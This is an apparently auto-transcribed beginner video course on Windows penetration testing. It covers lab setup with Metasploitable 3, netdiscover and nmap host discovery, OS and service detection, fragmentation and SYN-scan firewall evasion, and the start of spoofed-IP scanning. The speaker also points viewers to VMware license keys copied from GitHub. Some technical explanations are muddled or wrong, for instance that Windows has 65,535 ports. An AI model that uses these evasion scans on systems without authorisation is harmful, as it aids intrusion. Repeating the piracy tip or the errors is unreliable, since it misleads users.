Hello everyone, hope you are fine. In this classes we are learning how we can able to perform Windows penetration testing. See, this is a completely for beginners. The requirements for this training is you need basic knowledge about ethical hacking, okay, or networking. First of all, let me tell you this is a very easy training, okay. You no need to worry here. I just also provided the lab links here. Simple, just visit there and download the labs. Okay, it's a like Metasploitable 3 or something like that. But let me tell you, I just covered each and every the basic things for to perform Windows penetration testing. Okay, like and also I just covered how you guys can able to implement this all attacks when you just enter in one real world organization. Okay, so I just covered each and everything, but let me tell you one thing, guys. The thing is, first of all, you just need to watch this training in 1.5x, okay, speed, because due to the slang issue, sometimes you it might be slow, okay. So that's why the good speed is just try to watch this whole training in 1.5x or 1.2 or something, okay. Right, now here this is our target machine, okay. Basically, if you search here Metasploitable 3 GitHub, here you guys can able to see the first line. See, you guys can also create the image file by following this process, okay, but it will take some time. So the thing is, let's avoid it, okay. Now you guys can also download the pre-built images as well, okay. Just simple, to use a pre-built image, provide at https app.vagrantup.com/rapid7. Just click this one, and from here you just need to download this one. See, basically this is a Metasploitable 3 is a VM that is built from the ground up with a large amount of security vulnerabilities. You just need to download this one, Win2k8, okay. Here it is, simple, download this one. Now here, see, the thing is, you just need to select the VMware, okay. Select the second one, which is around 6.65 GB. See, when after, see, if you perform your each and every practice here on the VMware, then it is easy for you whenever you enter in any real world PT penetration testing field. Then it is very easy for you to do the things there, okay. Now simple, let me download this one, which is a very huge file. Simple, click here and download it. Now I already downloaded this one. Simple, you just need to extract this one, okay. Then go here and just download the Kali Linux. To download Linux, simple, just see here. Now before doing this, simple, click on the vmware.com and just download the virtual machine from here, okay. Sorry, VMware from here. Okay, where is the download page? Just get started. Now here it is. Now VMware try workstation 17 for Windows, okay. Now simple, download this one. It's around it's around 500 MB or something. Yes, 577 MB, okay. Let me cancel this one. I already downloaded this one. Let me show you. Here it is, okay. It's a pro version. See, there are two ways. If you see, you can also use a free one, okay. It's not a big thing, you just need to use only the pro one or something. It's totally a choice, okay. You can also use a pro version or you can also use a free version. So go with the free version. Assume that if you want a key, okay. Now how to get the key? See, to get the key, you guys can also search here VMware, where which version is this? 17, okay. VMware player 17 key GitHub. Here you guys can able to see the keys, just try to check this all keys. Okay, now just do it. Okay, see, basically here he just mentioned, please do not copy this. If you are frog it, don't edit it. If you have a problem, comment and people will try to help you. No virus, no spam, just license key. So the simple thing is, first of all, you just need to download the VMware from here. Okay, sorry, yes, VMware workstation. Okay, just download it from here. After downloading this one, here you guys can, after downloading this one, you will get the key there. Okay, like license, in the license field you guys can also, let me show you this one. If you click on the help, here there is a enter license key is there, right? Simple click after installing the VMware, click on the enter a license key here, and just copy this license key and paste there. Okay, it will work for you. In majority of cases it will work. Okay, so here is the comments. Okay, now this is the thing, we only need this much of things for Windows penetration testing. One, you just need the Metasploitable 3 and Linux. Linux is an attacker machine. Okay, yes, and to boot this Linux we need a virtual machine. We are not doing any kind of dual boot here. Okay, simple. I'm gonna show you how we can do this all stuffs. Okay, you no need to worry here. Now here there is a the key. Again I am saying the key is choice here. Okay, without the key also you guys can able to use a VMware workstation. There is a no need of key, but majority of people what they do is they have this kind of mind that they want to use pro versions. Okay, so for them you can also copy the key from here and you guys can paste it there. And the second thing is you also need a Windows 7 as well. Okay, simple, just download the Windows 7 ISO from any of this website. There is a Microsoft website. From here also you guys can able to download it. But if you want the ISO files, simple, join our Telegram channel. There I just uploaded the each and every ISO file, like the Metasploitable 3 one, simple, this one, Metasploitable 3, and this one as well. Which one? The Windows 7 ISO file, which I am using in this training. Okay, so there is a no need to worry about this all stuffs. It is a very easy thing. Okay, right, simple. Just see here, there is a Linux is there, right? Now simple, what I am using here, I am using the VMware, right? Now simple, click on the virtual machines. Okay, after clicking on the virtual machines, here you guys can able to see this one, virtual machine documentations. Pre-built virtual machines, Kali, VMware, and VirtualBox images are available for users who prefer or whose specific needs requires a virtual machine installation. Now the thing is, you assume that if you are using the VirtualBox, then you guys need to download this one, VirtualBox one. Okay, now what is VirtualBox? You know, right? VirtualBox is the same like a VMware, but this is a free version. Okay, uh, right now I just told you in this training we are using the VMware. See, there is a no difference. Okay, you no need to worry about this all stuffs. If you are using the VirtualBox, then go with it. Now let me see, there is a VMware 64-bit is there. Simple, download this one. Okay, which is around 2.6 GB. Just download this one. Let me download it. It will take around just 10 minutes or something. So let me pause the video. Right, here it is. Let me click on show downloads. Let me cut it this one and let me paste it on D drive. Now let me extract it. Okay, Remember, this is a version 2022.4. Okay, remember 22.4, and the previous which one I had is 22.3. Okay, don't be confused here. Right now, for this whole training, I am using the version 22.4. Okay, right. Let me tell you one thing, guys. First of all, you just need to install the VMware workstation. Okay, it's not a big deal. Simple, just double click it. Okay, after installing this thing, just next, next, next. That's it. Okay, you no need to set up a things or something. Just click next, next, next. That's it. Okay. Now, after installing the VMware on your desktop, you guys can able to see the VMware icon. Okay, like this one, right? Now the thing is, you no need to set up anything or something. Okay, like in the previous, what happened means we need to set up the Linux. Okay, we need to boot it. We just need to set the username and the password. You can also change the username and the password as well, but in the previous things are very hard. Sometimes what will happen means if we miss some kind of configuration there, then what will happen means the image file will be corrupted. Okay, we can't able to boot our Linux there. Okay, so this is a thing will so this is the things. Okay, so that's why what we did here means we just downloaded the VMware we just downloaded the VMware image from here. Okay, so it is easy for us. The simple thing is it is very easy for us to boot Linux in our VMware. Okay, so it will take some time. Here it is. Now simple, open this one, and here you guys can able to see, first of all, the thing you just need to do one thing. Okay, click on view and just click on file name extension, check this box, and also check this hidden items as well. Okay, after doing that, here you guys can able to see there is a VMX is there, this file. If you double click this one, then it will automatically open the file in VMware. Here it is, right? Here you guys can able to see, no need to set up nothing. Okay, it's a very easy process, simple. Here you guys can able to see the username and the password. The username is Kali and the password is Kali. Now simple, let me power on this virtual machine. So here it is. Now simple, just type here Kali. The password is also a Kali. Let me do one thing. Let me rename this one. Let me rename to Windows PD. Okay. Now this is our Linux. First, the thing you just need to do here, first thing is click on the VM, click on VM and click on settings. Here you guys can able to see the network adapter must be in NOT. Okay, used to share the host IP address. Simple, click this one. Okay, now it's totally depend upon you if you want to add a processor 4, or let me add the processor 1 as I just need to power off this and change it. Okay, and the memory 2 GB is enough. Okay, now processor, according to you can also set this here 2 or 1. It's totally depend upon you. Okay, now let me click OK here and simple shut down this one. And also here you guys can able to see we just downloaded the Vagrant box Rapid 7, this one. See, here it is. I just extracted this one, and here you guys can able to see the same thing as well, same like Linux. Okay, here you guys can able to see the VMX. Simple, double click it. In my case, it's already there. Here, just see Metasploitable 3 Win 2K18. Simple, power on this one. Okay, so this is a thing. Simple, control plus alt. Here you guys can able to see the icon, send control alt delete. Here just see the mouse pointer here. Here just press this one, and here is the administrator and there is a Vagrant user. Okay, now this is the thing. This is how you guys can able to boot the Windows Server 2008 R2, which is our Metasploitable 3. Okay, now the simple thing is, let me close this one, let me power off this one as well. Now let me boot the Windows 7 as well. Okay, the second thing is, first of all, just edit this virtual machine settings. Here there is a processor is 1, let me change it to 4, let me change it to 1. Okay, that's it, it's enough. Or let me do 2 as well. Okay, now here the memory is 2 GB. Okay, no problem. Now here you guys can able to see there is a Windows 7 is there. Okay, now let me boot this one. To boot this one, here it is. Simple, do one thing, click on this one, new window. Just first of all, let me show it like this as, sorry, where it is, let me, okay, click on new virtual machine, click on custom, this one, simple, click on next. There is a workstation 16 plus is there, and custom, let me select the typical. Okay, see, just select the typical. Okay, now here there is a installer disk image file is there. Now here just select the this Windows 7 file, the ISO file, double click it. Now simple, click on next, and here no need to add the product ID, full name, no need to add the password as well, it's totally depend upon you. Now click next here, click yes, and here the virtual machine name is Windows 7 x64. Okay, now location where you need to show the file here. Okay, now let me show this on G drive. Okay, you can also leave it. Okay, it's totally depend upon you. Right, now simple, click on next. Here the maximum size, just keep this to 30 or 20. Let me keep this to 30. Okay, store virtual disk as a single file, select this one, click next. 2 GB RAM and 30 GB hard disk. Okay, great. Now click on finish. So here it is, Windows 7 x64 64, it's booting. Right, see, the again I am saying, first of all check the VM. Whenever you just booted this machine, Windows 7, click on settings. Here it must be a not adapter. Okay, this one. Now simple, just select this one, it's already there. Simple, click on next. Now it will take some time to copy the files. So here it is, successfully. Setup. Now let me check. This is on not okay. Right, we successfully set up our labs. Now the first thing which we need to do, the thing is, see, whenever you're just working in a company, okay, Now you just need to first thing what you need to do. Okay, majority of cases what will happen means whenever you just enter in penetration testing field, whenever you enter in one company or if you are doing the work remotely, then the thing is here, the majority of projects, okay, a pen testing projects based on internal pen testing, okay, like you just need to pen test the internal systems, like assume that uh, they will provide you the VPN credentials, okay, like something like that, or yeah, assume that you just visited to that company, okay, on-site when you just sign for on-site projects, okay, when you enter in the field, at that time they will give you the credentials, okay, after getting that credentials you guys can able to connect with the company Wi-Fi, okay, then you guys can able to start the PT there, like you can test systems, okay, each and everything. Now the first thing what you need to do, see, I got assumed that this is a WhiteSec security company is there, okay, cyber security company. Now the thing is I just enter in this company and my client has been provided the Wi-Fi. I just connected with the company Wi-Fi. Now the thing is now the PD is started, okay, now I need to perform the penetration testing here. The first thing is I just need to identify my target IP address. Yes, I just need to identify this guy IP address. In my case, this guy is a target, right? Now I need to identify this guy IP address. To identify that, first of all, this is my Linux machine, okay? Simple. Now just let me edit something here. Just click on preference. Now here there is a Kali dark is there. Let me change it to green on black. Apply. Okay. Now let me zoom this one. Right. Now here you guys can able to see. Now first thing is you just need to type here ETH0. Just let me type here. If config first. Here there is a ETH0. Now I just connected with the internet, okay. So whenever you just connected with the internet, there here you guys can able to see the ETH0 and you guys can able to see the IP address as well, okay. Now the thing is here you just need to identify the IP address of your target machine. To identify that, simple, you just need to do, just type a simple command here. Simple, just type here net discover. This is a very simple command. Just net discover and just type here ETH0. See, I'm not specifying any ranges here. I'm not doing anything. I'm just explaining you this all stuffs in a very easy way. Simple. Just type here net discover ETH, sorry, dash I. You just need to specify here dash I for interface, okay, dash I for interface, because this is our interface, okay. Assume that you have the WLAN 1 here. Assume that you just connected with the in your laptop you just connected with Wi-Fi adapter, okay. So you guys can also type the adapter interface name. Assume that WLAN 1, WLAN 0 or something like that. But in my case, in majority of cases, people won't attach this wireless adapter, because it's only for the wireless pen testing purpose, okay. For system PT you no need that adapters, okay. Now here ETH0 is here. Now simple, just type here net discover dash I ETH0. Just type enter. See here, the cool thing about the Linux is it will show the this kind of outputs, okay. Whenever you get some errors, I'm gonna explain you this all stuffs, okay. Now just type here root. It's because the thing is it's telling you you must be a root to run this. Simple. At that time you just need to type here sudo. That's it. Now just type enter. Here it will ask you for the password. Now password, what is the password? Whenever we just log in our Kali system, we just, the password is there, right? The same password is the password is same Kali. Just type enter. Now you need to wait. Now it will scan for each and everything. Okay, so, see, majority of beginners will get some confusions like about the ranges, about the specify about the specific local IP. Okay, what we need to type there. For them, you no need to worry. Okay, simple, just type this command. It is easy for you. Okay, see, I can able to see the IP addresses right now. Here, this is a one way to identify the connected devices. Now there is another way, okay, which is very easy. You no need to worry about that one. Just let me stop it. Okay, I'm gonna teach you how to identify the target, which is our target. It's a Windows or Linux system. I'm gonna teach you that one. But first of all, let me show you how you guys can also uh, just let me show you the another method as well. Okay, let me open another terminal from here. Now simple, just type here IP ADDR. Here you guys can able to see, just focus on ETH01. Here, just see, it's a 19. First of all, just focus here our net discover results. Okay, results is same. Here you no need to worry. See, the first three parts are same, 192.168.133 point, and here at the fourth one the values are changing. Okay, just see, in fourth section the values are changed. Here 187, 1, 2, 254, but here the values are same. Okay, so at that time you just need to run the scan as well. Okay, you can also now let's run the scan uh, through the ranges. Okay, now how to do that? The simple thing is here, just do this one. Let me run it here. Just type here sudo net discover dash I for ETH0, which we mentioned. Just type here dash R for ranges, and here in the ranges just do one thing. Just copy this 3 from 192.168.133. Just simple paste it here. Now the thing is, we don't know uh, the this ones. Okay, like the fourth one. At that time, simple, just start from 1 here. Okay, like this, and then simple, just type here forward slash and just type 24. Okay, it's a nothing but you are scanning through ranges. Okay, like you are specifying that see, every system will comes under this one only. Okay, yes. Now simple, just type enter here. Now just see, it can scan in a very easy way. Now it's took around something uh, 2 to 3 seconds. Okay, so this is a thing. Now there is another way. By using nmap also you guys can able to check this. Simple, just type here IP space ADDR, then go back here. Simple, just type here sudo nmap dash sn, and then just specify the this 3 one. Okay, 192.168.133. In your case this might be different. Okay, so just paste the first starting 3 one, and simple, just here add the dot. Okay, and then add star here. That's it. Just type enter. Now it will scan for all active IPs. Now this one is active, this one is active. Okay, like who are connected with our this one, our Wi-Fi network. And here just see, I can able to see by using nmap. Okay, this is a thing. Now let's see this one. Here I got the IP address which are connected with my Wi-Fi network. Now here the thing is, first of all, focus on this one. See, in majority of cases what will happen means the starting 2 IPs or your router IP addresses, you need to ignore it. Okay, because 192.168.133 192.1 is there, and same thing is here, okay, 133.2, okay, is there. But let me tell you, in majority of cases this IP address are related to your router, okay, so we no need to perform the PT there, okay, we no need to check that one. So if you want to check, then you guys can also check that one as well, okay, it's not a big deal. Now here we got the just take a look here, this one we need to analyze this one, because it says something different is there, okay. Now here 192.168.133.187 is there, 254 is there, 183 is there. Now first of all I need to check my Linux IP address, okay. Now simple, just type here if config. Here you guys can able to see inet 192. In my case my Linux IP is 183. Just focus here, 183. Here there is my Linux IP, okay. So let me ignore this one as well. Now I need to check this IP address and this one. Now let me do one thing, just copy this IP and simple just type here ping, okay. Now simple, see I know my target is using the Windows system, okay, because this training is totally about Windows penetration testing for beginners. So the simple thing is, let me paste this one here. You guys can able to see the, just let me Control C to stop it. See, if you know a little bit about networking or ethical hacking, then you will get this one. Here it's using the ICMP packets and TTL is 128. Now just focus here. First of all, by identifying seeing this TTL, we can able to identify that our target is using the Windows or Linux or Mac or something, okay. So how to do that? Now here just see we got the TTL 128 and it's using the ICMP packets, okay. Now simple, just open there is a one website. From here you guys can able to see default TTL time w values of different OS. In my case the TTL is what, 128, okay, and it's using the ICMP packets. Now let's just see here. Here is a TTL protocol version device. Now in our case the protocol is what, ICMP, and the TTL is 120 what, 8, right? Yes, just let's go back here. Now let me see the 128 one, okay. Just first let's focus on the, now see here it's having the 128 but it's using the protocol of TCP, but in our case the protocol is what, ICMP. So let me check for ICMP. Here I got the ICMP and the TTL is 128. So here you guys can able to focus, okay, 128. So I know that it's using the Windows system, but I don't know it's using the Windows 11, Windows 10, Windows 7 or what, okay, I don't know that. So there are two ways to identify that, by using the Nmap, okay, or by there is another method which I'm gonna cover. So just first of all let me show you the basic things, okay. Now here the thing is, let me type here, first just type here sudo nmap, just type here dash capital O for OS detection, okay, and simple paste the target IP address. I know that this is using the Windows system, okay, by knowing the TTL. Now simple, let me paste it here, okay. Now just type enter. It will take some time, just wait. Here I got the thing, okay. Now see, at the first scan I can't able to see the thing here, okay. It's showing like this, but let me tell you, here it's a Microsoft DS. Whenever you guys can able to see the Microsoft, you need to think that it's a confirm that it's a Windows system, and by using the TTL also we can able to confirm that our target is the IP is related to Windows system. Now I can't able to see the OS here. At that time just run it again. Due to some configuration problems it's showing like that, but at second scan it gonna show you the results. It's running on Microsoft Windows 7. Now I can able to identify that my target is using the Microsoft Windows 7. Okay, now I'm gonna perform the PD there. I'm gonna perform the penetration testing. Okay, so let's start it. Okay, now now these are the open ports. I'm gonna teach you how to scan for the open ports, each and everything, so no need to worry. So right, this is how you guys can able to identify the OS detection, right? Thank you. Now let's learn about Nmap and about these ports. Okay, now in Windows system there are around 65,535 ports are there. Okay, now here you guys can able to see there are whenever we just let me show you. Let me type here clear. Okay, now simple, just type here nmap. Let me run a normal scan here. If you type nmap and if you simple paste IP here, then you will see this results. Okay, the nmap, this is a normal scan. Okay, by default you can also say that it's a default scan. Now in default scan what will happen means it's only scan for 1,000 ports. Okay, most commonly used ports. Now here it scan 1,000 ports. In this 1,000 ports there are this many ports are open and 976 ports are closed. Okay, now it's like nmap will scan again I am saying it will scan the most common ports. Okay, these are the most common ports for nmap. Okay, top 1,000 most common ports. Now here you guys can able to see the SSH, MSRPC, NetBIOS, each and everything. Okay, now this is a nothing but this is a normal scan. Now assume that I want to run whole just let me type here first of all nmap dash p dash. What is this? Let me tell you. See, whenever I just add this flag in nmap like a dash p dash, that means I'm gonna scan the all ports in the Windows system, like each and every port. Like I'm gonna scan 65,535 ports, every port. Okay, like if I type enter here, then what will happen means just see the results. It will take some time because it's a very huge. Now here we got the results. Now it's scanned for 65,487 ports. Okay, sorry, it scanned for whole 65,535 ports, but here he can only find this open ports, but 65,487 ports are closed. So this is the thing. See, in majority of cases what will happen means we in the real world PT or as a red teamer, or see in the red team field it will happen a lot, because see what will happen means in the we won't perform this one, this scan in the real world, because it will generate a huge noise. So at that time what we gonna do means we will specify the specific ports here. Okay, now in our case just see assume that we want to target the SSH. At that time what we gonna do means assume that I want to check in my target system the SSH port is open or not. At that time what I'm gonna do means simple, I just type here nmap dash p. Okay, now just type here what is the SSH port. See, first of all you just need to open the list here. Okay, the port list. Okay, like most common ports or all ports, like you just need to open. Let me open the list here. Now here it is. There is a this is a most commonly used ports. Okay, this one 1 2 3 17 this 443 for HTTPS. Don't worry if you are not getting this. Now here it is, social.technet technet.microsoft.com. From here you guys can able to learn about all these ports. Okay, the port here you guys can able to see 21 is for FTP, and here you guys can able to see the SSH one. Okay, I need to check that. Okay, but let me just focus here. Here there is a 22 for SSH. Now I need to check only for I need to check that in my target system the SSH port is open or not. At that time what I'm gonna do means just type here nmap -p21, just see the port number there, sorry 22, right? Okay, 22, and paste the IP address and just type enter. Now just see the port 22 is open and services SSH. Okay, now assume that the thing is see, I need to scan the ports from 7 to, okay, from 7 to, let me scan till 593. Okay, how to scan like that? Assume that you guys can also specify that one. Let me, my target is, let me scan from port 7 to, okay, from port 7 to, you can also scan until from here as well, but let me target from 593. Okay, 593, this one. Now to do that thing, just type here nmap, okay, -p. Now my target is 7, and from I'm gonna scan from 7 to, what is the port? 593, right? Now just type here 593 and simple paste the IP address. Now it will scan for the ports from where? 7 to 593. Okay, now just type here enter. See here in 583 closed TCP ports are there, but here I can able to see 22 port is open, 135 port is open, 139 port is open, 445 port is open. In between these numbers, okay, like from 7 to 593, we can able to see these ports. Okay, these ports are open. Now assume that, let me scan from 593 to 2103. Same thing. Okay, two one zero three. Now it will scan from 593 port to 2103 port. Now here I got only 1617 port is open. Okay, here you guys can able to see the service. Now let me run the default scan as once again. Okay, now this is a default scan. Now I need to identify the service version detection. Okay, like see, let me first of all let me run this scan, then I'm gonna show you what will happen. Just type here dash small s capital V, just type enter. It's a nothing but service version detection. Now just wait. See, let me tell you, this scan is very important in real world scenarios. This scan is very important, again I am saying, because just wait for the results. Now we got the versions here. Now what is this versions? Now let me tell you, the SSH service is using the OpenSSH 7.1 version. Okay, and here you guys can able to see MySQL is there. MySQL is using MySQL 5.5.20-log. And this, see, by using this one, by using this versions, we can able to identify the exploits. Okay, like simple. What I'm gonna do in an easy way, let me explain. Just copy this version here. Okay, simple. I'm gonna copy it and I'm gonna search it on internet like this. Simple. I can able to find the results. I'm gonna read this one. Okay, uh, so there is a exploit DB is there. So to exploit it, I'm gonna show you how you guys can able to exploit it. Okay, so this is a thing. So that's why the version is very important in our case. Assume that our client is using the outdated versions there. Okay, outdated softwares. Then we gonna recommend them that just use the updated one. Okay, now Windows 7, the Microsoft is not providing the updations for the Windows 7. Okay, assume that my client is using the still my client is using the Windows 7. At that time, what will happen? Any attacker can able to attack that Windows 7, right? Because in Windows 7 the vulnerabilities are there. Why there are vulnerabilities? The simple thing is Microsoft is not updating the Windows 7. Whenever the provider is updating the things, then what will happen means, see, in updation the provider is patching the vulnerabilities there. Okay, so that's why assume that my target is target or my client is using this one, this outdated services. Then we need to write the report there. Okay, like this service is using this outdated product. So simple, just update it. Okay, so we gonna report it. See, hacking and penetration testing is not much difficult. Okay, so you just need a little bit knowledge, that's it. And just do the you just need to practice a lot there. Okay, so it's a very easy thing. And the second thing is why I'm saying the penetration testing is easy, because in this field you guys, majority of people will help you. Okay, like it's not like other IT industry like Python or something, or other SAP or something like that. Okay, it's a here people will help you a lot. Okay, whenever you ask for the doubts, they gonna help you for free. Okay, so this is the thing. So you no need to worry. First of all, just try to practice. Okay, so I'm gonna cover each and everything, so no need to worry, right? Here I'm gonna show you how you guys can able to detect the firewall. Okay, to detect the firewall, the first thing is, let me enable the firewall on my target system. Okay, this is I just enable the firewall here. Now let's go back to our Linux machine, and simple, just type here sudo nmap space dash s capital A and add your target IP address here. This is my target IP. Now simple, just type enter here. Now here you guys can able to see not showing 1000 filtered TCP ports. Whenever you see like this, okay, like filtered, that means the firewall is enabled in your target system. Okay, now let me do one thing. Simple, I'm gonna teach you how you guys can also bypass these things. Okay, now simple, let me disable the firewall. Now let me show the output there. Click OK. Now let's go back to my Linux machine and let me execute the same command. See, here you guys can able to see not showing 1000 unfiltered TCP ports are there. Unfilter is a nothing but that means the firewall is disabled in our target system. Let me tell you again. See, filtered means firewall is enabled in our target system. Unfiltered means there is a firewall is disabled in our target system. So this is the thing. Now let's learn some firewall evasion techniques, how you guys can able to bypass these firewalls, each and everything. Okay, now the thing is, let me do one thing. Okay, now here let me enable the firewall. Click OK. Here we will cover how we can able to bypass the firewall using the fragment method. Basically, just see, I just enable the firewall here, and let's go back to our Linux machine, and simple, just type here nmap space dash F and just type here dash S capital V. I'm gonna perform the service version detection here. The new flag we are adding is dash F here. Dash F is a nothing but it's a fragment. I'm gonna explain you about fragment. What is this fragment, each and everything. So you no need to worry. But let me tell you one thing, guys. This method will be mostly work with the older versions of Windows systems. Okay. Now just type enter. You need to run this as a root user. Now simple, just type here sudo. Again, I am saying here the firewall is enabled. I'm gonna teach you a huge ways to bypass the firewall. Okay, you no need to worry. See, still I can able to perform the scan there. Okay, even the firewall is enabled. Right, this is a vulnerable machine, so that's why if you disable if you enable this one and if you doesn't add this F there, then also it will show the output. But in real world what will happen means it will won't show you, okay, the results. It will say that it's a filtered or something. So at that time you just need to add F here. Okay, now let me tell you about this fragment. Okay, now here the Nmap offered that ability to fragment the packets while scanning with the dash F option, so it can bypass the packet inception of firewall. Fragment packets Nmap in the next image. Now I'm gonna explain you about this fragment packet. Okay, just wait. Just see here. Just see in my target system the firewall is enabled. Okay, here we are using the dash F flag. Okay, like fragment. Right, here is my attacker system. Here what I did means I just let me scan for OS detection. Okay, just type here nmap dash O for OS detection. Then let me scan for service version detection as well. Then let me use the dash P dash to scan all open TCP ports, and let's add my target IP address. This is my target system. Now in the target system the firewall is enabled. Okay, now I just sent this packet to this guy. Okay, to know the this one, to see the output of like I want to know that the OS and the versions, the open ports, each and everything. Now see, it's look like suspicious, right? Anyone can see somebody is trying to capture something from my device. Okay, like he want to gather information about me, like about my OS, about my services which are running in my system, each and everything. It's look like it's suspicious. At that time what will happen means this firewall will block this packet. Okay, yes, at that time we can't able to receive the results here. So that's why we are using dash F flag here. It's a nothing but fragment. Now in fragmentation what will happen means, now let's take an example of alphabets. Okay, now just type here A, B, C, D, E, F. Okay, now I just sended this packet to my target system. The firewall is enabled here. At that time what will happen means this firewall will block this packet because this look like a suspicious and this is a very huge packet. Okay, now what I'm gonna do means I'm gonna add the dash F here. Then what will happen means it will send this packet like see here whenever we just avoid this fragment here, assume that this is a normal one. We are just sending this packet to my target system. At that time what will happen means the same command will send it to the target system. If we use dash F here, then it will divide this one. Okay, like it will separate this one. Like first it will send A to the target system. Okay, and then B, then C, then D, then E, then F. At the last it will be normal. Okay, like A, B, C, D, E, F. At that time what will happen means we will see the results here. Okay, like our port, each and everything, the OS, each and everything. So this is how the things are working here. Basically, it will send the packet in different, it will send the packet separately to my target system. So this is the way. So simple. From here, you guys can able to learn more about this one, pentestlab.blog, about this fragmentation. Okay. So let me tell you again, mostly this method is work with the older version of the Windows system. Again, I am saying this thing. Now in this classes, we are learning about SYNSCAN. What is SYNSCAN here? SYNSCAN is nothing but, SYNSCAN is a default and most popular scan option for a good reason. It can be performed quickly, scanning thousands of ports per second on a fast network, not hampered by intrusive firewall. The simple thing, what is this? See, basically this SYNSCAN, before learning this one, you just need to learn about three-way handshake. Okay. Now, what is this three-way handshake? This is a very important thing. Now, in a easy way, I'm gonna explain you. I don't want to go in deeper in it. Simple, just type here sudo. Just type here nmap. Let me run the SYNSCAN here. Okay, just type -ss, capital S at the just type like this, small s and capital S. Now let me scan for service version detection and just paste your target IP address. Okay. Now, whenever we send this command to our target system, how the nmap is knowing the ports here, okay, how he show the output here, okay, like in the simple words, how nmap knows that the port is open or closed or something, how he know that? Now the simple thing is, due to this three way handshake. Okay, now first of all, client, and here is a server. Now what is a client? Okay, simple way, what is a client? In the client is a nothing but, in this term, in our term, client is a Kali system. Okay, this one, client is our target attacker system, and the server is a nothing but our Metasploitable 3. Sorry, it's half. Okay, let me turn it on. Okay, now just see what happened means, I want to know that the port 21 is open or not in my target system. At that time, I'm gonna provide the command in the terminal like nmap -p 21. Then I'm gonna provide the server IP address there. Okay, then see the request will be sent through SYN packet. Okay, now I just send it the request to my server. From my server, assume that the port 21 is open in the server. Then the server will respond with SYNACK. SYNACK means SYNACK is nothing but, that means this packet is telling to my Kali system that yes, the port 21 is open. Okay, after receiving this SYNACK packet, then our Kali system will send the ACK packet to our target system. Here the ACK packet is nothing but acknowledgement, that means I receive that. Okay, now then the connection will be established. This is how the things are working. Okay, now in this cases, in the SYN cases, we are performing the SYNSCAN here. In this case, what will happen means, we will send this one, the SYN packet. From our target, we receive the SYNACK. See, after receiving the SYNACK, that means the port is open. Then why we need this ACK and this all stuffs? Okay, that means by using this SYN one, we are avoiding this thing. Okay, we are avoiding this ACK. Okay, instead of ACK, what we are doing, we are using the RST. What is the RST here? Okay, RST and map. RST, a SYNACK indecence. Okay, indecence, the port listening. Okay, here is a good way. Well, RST is a reset. Okay, what is a RST? RST response means the port is closed. This, the simple thing is, RST is a nothing but the port is closed, but there is a live computer here. No response indications. See, in the simple way, let me tell you, RST is a nothing but what? To close the connection. Okay, that means, see, it doesn't create the establishment here. Simple, it will close the connection. So that's why here it's saying that SYN-SCAN is a default and most popular scan option for good reason. It can be performed quickly. That means it's a fast, because here we are avoiding this ACK here. Okay, instead of ACK, what we are sending? RST packet. Okay, let me show you practically. You will get this one. Let me open Wireshark from here. Just type sudo Wireshark. Before opening the Wireshark, just let me show you my IP address. Okay, if config. Now my IP address is what? Remember, 133.183 is my Kali Linux IP address. My target IP address is 187.133.187. Okay, right. Now simple. Let me open the Wireshark. Just open the Wireshark as a sudo. Okay, then only you guys can able to see ETH0 here. Assume that you just open Wireshark as a normal like Wireshark, then you can't able to see the ETH0 there. Now simple. Now I am sending, I am using the SYN-SCAN here. I am using the flag of service version detection. Okay, and this is my target IP. Now let me open the ETH0 here. Right, if I enter this, stop. Now here just see, my target system is sending the SYN packet. Remember, then from my target, okay, from my target, see here is my target IP 187. Here you guys can able to see I receive the SYN-ACK packet here. Okay, see, from my target system to my Linux system, I receive the SYN-ACK packet. That means it's saying that the port is open. Okay, now then it's sending it's sending the RST here. See, RST is what? To close the connection. Okay, see, my Kali Linux is sending the RST ACK packet to where? To my target system. That means to close the connection. This is how the things are working here. Okay, now just let me go down. See, here ACK. You need some basic knowledge about networking. Okay, here there is a FIN is there. Okay, so simple. You guys can also do the Google there. Okay, I think. Okay, let me open the thing here. Still the scanning is working here. See here, my Linux is sending what? ACK packet. We just see this ACK in three-way handshake. Okay, that means acknowledgement. RST. It's closing the connection here. Okay. Whenever you see the red things here, just focus there. There will be a RST. Now I think I got the result. Yes, see, I got the result. See, this is also a very basic way to bypass the this one, the firewall, because it's not establishing the connection. See, in the three-way handshake, it's establishing the connection here. It's look like a suspicious, like somebody is trying to establish the connection with your target, your system. That means it's a suspicious. The firewall will be blocked that things. Okay, at that time we will use a SYN-SCAN here. Okay, hope you guys understand. If you are not getting this, no need to worry. Just do the practice, and you will get this one. Okay, it's a very easy things. How you can able to perform the scanning using different IP addresses. Okay, like now let me explain you. Now here I'm gonna teach you two steps here. First is how to use different IP addresses to perform Nmap scanning to hide your IP address. I want to hide my this IP address. Okay, my Linux IP address. After hiding that, I'm gonna scan with the different IP addresses. Okay, now I'm gonna explain you that one. Okay, sorry, I'm gonna show you practically how we can able to do that. And second thing is I'm gonna teach you about spoofing as well. Now what is spoofing? Just focus here. Now see, I just enter in one company, okay, for PT. Now this is a Wi-Fi network. I just connected with this Wi-Fi network. Okay, my Kali is connected with this Wi-Fi network. Then I just perform the net discover here. After performing the net discover, I can able to see some Windows devices there. Okay. Now clients told me that just perform the PT on this specific IP. Okay. Now what I did means I just chosen that IP address from the list. Then assume that this is my target IP. Okay, a target system IP. Okay, let me like this. Okay, this is my target system. Then now just see what happened means, let me type here Kali Windows. Now what happened means I just performing the scan here by using the nmap. Okay, after doing that, sometime what happening means it can't able to show the results because it's blocking my IP, because this guy is a not trusted one. Okay, here the firewall is enabled. See, in the PT in the real world, you guys can also told them you can also ask for whitelist your IP. Okay, the it's totally depend upon you, but let me explain you this stuffs as well. Okay, now here what happened means you guys can't able to access this one. Okay, you can't able to grab the results from this system at that time. You guys can do one thing. Okay, you just perform the net discover, right? In the net discover, you guys can able to see the different IP addresses who are connected with this system network. Okay, this Wi-Fi network. See here again, I am saying you are the new guy in this network. Okay, so sometimes due to firewall rules, they won't accept the new guys. Okay, because this is a kind of this is a firewall, right? Assume that any hacker enter in this organization and he just perform the scanning on any kind of IP addresses, sorry, any kind of okay, let me take an example of he's just performing the scanning on any IP, then it is a suspicious. Okay, so what they do means in companies, they block the scanning. Okay, like any suspicious activities from new systems. Okay, like this guy is a new guy here. Okay, basically this is a new guy. Even I just entered in this network, I just connected with this Wi-Fi network, then also I can't able to perform the scanning on the connected systems. Okay, so at that time what we can do means we can spoof the IP addresses of different systems. Assume that here this is a router IP address. Okay, in the last classes we show we can able to see the router IP address, right? 192.168.133.1.1. okay, this is my router IP address. In the last classes we see this local IP. Simple, what I'm gonna do means I'm gonna scan this Windows system as a this IP. 